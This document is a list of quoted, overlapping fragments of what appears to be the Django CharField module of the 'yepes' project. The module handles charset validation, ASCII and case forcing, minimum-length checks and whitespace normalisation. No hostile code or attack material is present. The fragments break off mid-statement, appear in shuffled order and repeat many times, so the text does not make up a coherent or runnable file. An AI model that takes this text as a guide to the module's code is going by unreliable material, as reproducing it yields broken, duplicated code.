"if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not",
"[] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length,",
"'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is",
"= kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is",
"self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None:",
"increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description",
"a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self,",
"elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be",
"be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length,",
"= super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii':",
"value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper()",
"return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value if",
"import models from django.utils import six from django.utils.encoding import force_text from django.utils.translation import",
"django.db import models from django.utils import six from django.utils.encoding import force_text from django.utils.translation",
"from __future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from",
"or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and",
"params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return value",
"def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower",
"checks.Error( \"'max_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', )",
"if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <=",
"True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params",
"elif self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii: value",
"be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ]",
"description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii =",
"check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def",
"isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None",
"self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0):",
"'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs): params =",
"is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [",
"if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs)",
"= kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length =",
"<= 0): return [ checks.Error( \"'min_length' must be None or a positive integer.\",",
"= kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces =",
"kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces':",
"CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator",
") ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return",
"{ 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length,",
"self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None:",
"self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces",
"} params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value): if value is None: return",
"'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return []",
"def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields')",
"path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset,",
"import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not",
"yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators",
"None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors =",
"return value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif",
"check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char',",
"obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String')",
"isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces:",
"'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return",
"value.strip() if not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower:",
"super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args,",
"**kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper':",
"self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs))",
"(not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be",
"elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must",
"import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField from",
"None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types)",
"import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import",
"checks from django.core.validators import MinLengthValidator from django.db import models from django.utils import six",
"] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return []",
"**kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <=",
"False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True)",
"import MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding import",
"self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease",
"self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None or a positive",
"hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length",
"from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length",
"not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif",
"value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower()",
"'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name,",
"value is None: return value if not isinstance(value, six.string_types): value = force_text(value) if",
"None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if",
"<reponame>samuelmaudo/yepes # -*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks",
"not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors",
"must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else:",
"return [ checks.Error( \"'min_length' must be None or a positive integer.\", hint=None, obj=self,",
"not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value =",
"isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must be None",
"variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True,",
"self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces,",
"clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None",
"value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value =",
"check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length, six.integer_types) or self.max_length",
"or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField):",
"cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', )",
"= { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length':",
"from django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import",
"] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot",
"not None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error(",
"obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is",
"None: return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value",
"return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error(",
"= force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip()",
"None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return []",
"**kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length",
"or self.max_length <= 0)): return [ checks.Error( \"'max_length' must be None or a",
"or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def",
"from django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as",
"__init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower =",
"args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset':",
"super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not",
"= value.strip() if not value: return value if self.force_ascii: value = unidecode(value) if",
"errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name,",
"name, path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs,",
"import force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms from",
"'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def formfield(self, **kwargs):",
"value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = '",
"or self.min_length <= 0): return [ checks.Error( \"'min_length' must be None or a",
"errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs =",
"return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase",
"id='yepes.E113', ) ] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def",
"return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField,",
"\"'max_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ]",
"(not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must be",
"path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False,",
"id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None:",
"MinLengthValidator from django.db import models from django.utils import six from django.utils.encoding import force_text",
"self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length))",
"None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [",
"six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater than",
"than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return",
"from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from",
"and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\",",
"be None or a positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return",
"six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value",
"yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not",
"six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length' must be None or",
"kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset",
"= kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces =",
"self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower':",
"self).formfield(**params) def to_python(self, value): if value is None: return value if not isinstance(value,",
"yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is",
"-*- from __future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator",
"integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length):",
"= kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper =",
"positive integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs):",
"0): return [ checks.Error( \"'min_length' must be None or a positive integer.\", hint=None,",
"self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper",
"self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length",
"def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif (not isinstance(self.min_length, six.integer_types)",
"\"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113',",
"self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value:",
"and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length' must",
"args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii':",
"'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params)",
"kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs)",
"] else: return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args,",
"unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db import models",
"= kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args,",
"if not value: return value if self.force_ascii: value = unidecode(value) if self.force_lower: value",
"checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self,",
"False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is",
"import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db import",
"self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute =",
"import checks from django.core.validators import MinLengthValidator from django.db import models from django.utils import",
"None, 'force_ascii': False, 'force_lower': False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False,",
"is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs):",
"False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs)",
"def to_python(self, value): if value is None: return value if not isinstance(value, six.string_types):",
"= ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value",
"path, args, kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={",
"[ checks.Error( \"'max_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E111',",
"from django.core import checks from django.core.validators import MinLengthValidator from django.db import models from",
") ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length'",
"**kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False)",
"checks.Error( \"'min_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', )",
"params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper,",
"return [] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset",
"must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112', ) ] elif",
"coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from django.core.validators import",
"to_python(self, value): if value is None: return value if not isinstance(value, six.string_types): value",
"force_text from django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated",
"CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None)",
"not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors",
"(isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [ checks.Error( \"'min_length' cannot be greater",
"kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length',",
"self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii: value =",
"= super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path,",
"yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self,",
"integer.\", hint=None, obj=self, id='yepes.E111', ) ] else: return [] def check_min_length_attribute(self, **kwargs): if",
"= _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii',",
"False, 'force_upper': False, 'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path,",
"self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField,",
"self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField, self).formfield(**params) def to_python(self, value):",
"= check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path =",
"formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower,",
"unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper: value = value.upper() return value",
"import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and (not isinstance(self.max_length,",
"= path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False, 'force_lower': False, 'force_upper':",
"as _ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import",
"True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not None:",
"self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces,",
"force_text(value) if self.normalize_spaces: value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if",
"return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value =",
"value = value.strip() if not value: return value if self.force_ascii: value = unidecode(value)",
"ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils",
"from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes import",
"kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces',",
"is None: return [] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return",
"kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces',",
"super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None, 'force_ascii': False,",
"value = ' '.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return",
"[] elif (not isinstance(self.min_length, six.integer_types) or self.min_length <= 0): return [ checks.Error( \"'min_length'",
"yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct",
"# -*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from",
"kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length is not",
"kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper',",
"False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False)",
"django.utils.translation import ugettext_lazy as _ from yepes import forms from yepes.fields.calculated import CalculatedField",
"import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs):",
"kwargs = super(CharField, self).deconstruct() path = path.replace('yepes.fields.char', 'yepes.fields') clean_keywords(self, kwargs, variables={ 'charset': None,",
"[] class CharField(CalculatedField, models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset =",
"def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower':",
"*args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower',",
"-*- coding:utf-8 -*- from __future__ import unicode_literals from django.core import checks from django.core.validators",
"'.join(value.split()) elif self.trim_spaces: value = value.strip() if not value: return value if self.force_ascii:",
"None) self.force_ascii = kwargs.pop('force_ascii', False) self.force_lower = kwargs.pop('force_lower', False) self.force_upper = kwargs.pop('force_upper', False)",
"obj=self, id='yepes.E112', ) ] elif (isinstance(self.max_length, six.integer_types) and self.max_length < self.min_length): return [",
"from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def",
"kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii,",
"is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return",
"from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if (self.max_length is not None and",
"hint=\"Decrease 'min_length' or increase 'max_length'.\", obj=self, id='yepes.E113', ) ] else: return [] class",
"None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute",
"import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from",
"(name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField, 'charset':",
"is None: return value if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces:",
"def check(self, **kwargs): errors = super(CharField, self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute",
"'form_class': forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length':",
"from django.db import models from django.utils import six from django.utils.encoding import force_text from",
"django.core import checks from django.core.validators import MinLengthValidator from django.db import models from django.utils",
"self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces = kwargs.pop('trim_spaces', False) super(CharField, self).__init__(*args, **kwargs) if self.min_length",
"'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, }",
"return (name, path, args, kwargs) def formfield(self, **kwargs): params = { 'form_class': forms.CharField,",
"self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def check(self, **kwargs): errors = super(CharField,",
"value if self.force_ascii: value = unidecode(value) if self.force_lower: value = value.lower() elif self.force_upper:",
"else: return [] def check_min_length_attribute(self, **kwargs): if self.min_length is None: return [] elif",
"value): if value is None: return value if not isinstance(value, six.string_types): value =",
"forms.CharField, 'charset': self.charset, 'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length,",
"if not isinstance(value, six.string_types): value = force_text(value) if self.normalize_spaces: value = ' '.join(value.split())",
"self.min_length <= 0): return [ checks.Error( \"'min_length' must be None or a positive",
"unidecode from yepes.utils.deconstruct import clean_keywords from yepes.validators import CharSetValidator def check_max_length_attribute(self, **kwargs): if",
"_check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct() path",
"'force_ascii': self.force_ascii, 'force_lower': self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces':",
"[ checks.Error( \"'min_length' must be None or a positive integer.\", hint=None, obj=self, id='yepes.E112',",
"_ from yepes import forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode",
"__future__ import unicode_literals from django.core import checks from django.core.validators import MinLengthValidator from django.db",
"self.min_length): return [ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or",
"forms from yepes.fields.calculated import CalculatedField from yepes.utils import unidecode from yepes.utils.deconstruct import clean_keywords",
"self).check(**kwargs) errors.extend(self._check_min_length_attribute(**kwargs)) return errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs",
"self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs) return super(CharField,",
"[ checks.Error( \"'min_length' cannot be greater than 'max_length'.\", hint=\"Decrease 'min_length' or increase 'max_length'.\",",
"self.force_lower, 'force_upper': self.force_upper, 'max_length': self.max_length, 'min_length': self.min_length, 'normalize_spaces': self.normalize_spaces, 'trim_spaces': self.trim_spaces, } params.update(kwargs)",
"'min_length': None, 'normalize_spaces': True, 'trim_spaces': False, }) return (name, path, args, kwargs) def",
"django.utils import six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _",
"if self.min_length is not None: self.validators.append(MinLengthValidator(self.min_length)) if self.charset is not None: self.validators.append(CharSetValidator(self.charset)) def",
"six from django.utils.encoding import force_text from django.utils.translation import ugettext_lazy as _ from yepes",
"models.CharField): description = _('String') def __init__(self, *args, **kwargs): self.charset = kwargs.pop('charset', None) self.force_ascii",
"if value is None: return value if not isinstance(value, six.string_types): value = force_text(value)",
"return [ checks.Error( \"'max_length' must be None or a positive integer.\", hint=None, obj=self,",
"errors _check_min_length_attribute = check_min_length_attribute def deconstruct(self): name, path, args, kwargs = super(CharField, self).deconstruct()",
"self.force_upper = kwargs.pop('force_upper', False) self.min_length = kwargs.pop('min_length', None) self.normalize_spaces = kwargs.pop('normalize_spaces', True) self.trim_spaces",
"None and (not isinstance(self.max_length, six.integer_types) or self.max_length <= 0)): return [ checks.Error( \"'max_length'",
